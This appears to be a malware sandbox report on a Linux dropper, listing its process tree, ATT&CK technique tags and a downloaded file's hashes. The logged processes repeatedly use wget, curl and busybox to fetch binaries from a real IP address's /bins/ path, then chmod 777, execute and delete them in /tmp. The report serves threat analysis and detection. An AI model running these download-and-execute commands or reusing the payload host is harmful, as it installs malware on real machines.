/bin/chmodchmod 777 LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo./LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- Executes dropped EXE
PID:1664
-
-
/bin/rmrm LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:1665
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:1666
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- Writes file to tmp directory
PID:1667
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:1668
-
-
/bin/chmodchmod 777 3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb./3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm 3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:1671
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:1672
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- Writes file to tmp directory
PID:1673
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:1674
-
-
/bin/chmodchmod 777 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- File and Directory Permissions Modification
PID:1675
-
-
/tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9./26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- Executes dropped EXE
PID:1676
-
-
/bin/rmrm 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:1677
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:1678
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Writes file to tmp directory
PID:1679
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:1680
-
-
/bin/chmodchmod 777 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- File and Directory Permissions Modification
PID:1681
-
-
/tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef./d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Executes dropped EXE
PID:1682
-
-
/bin/rmrm d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:1683
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:1684
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Writes file to tmp directory
PID:1685
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:1686
-
-
/bin/chmodchmod 777 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- File and Directory Permissions Modification
PID:1687
-
-
/tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e./Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Executes dropped EXE
PID:1688
-
-
/bin/rmrm Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:1689
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:1690
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Writes file to tmp directory
PID:1691
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:1692
-
-
/bin/chmodchmod 777 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- File and Directory Permissions Modification
PID:1693
-
-
/tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B./rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Executes dropped EXE
PID:1694
-
-
/bin/rmrm rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:1695
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97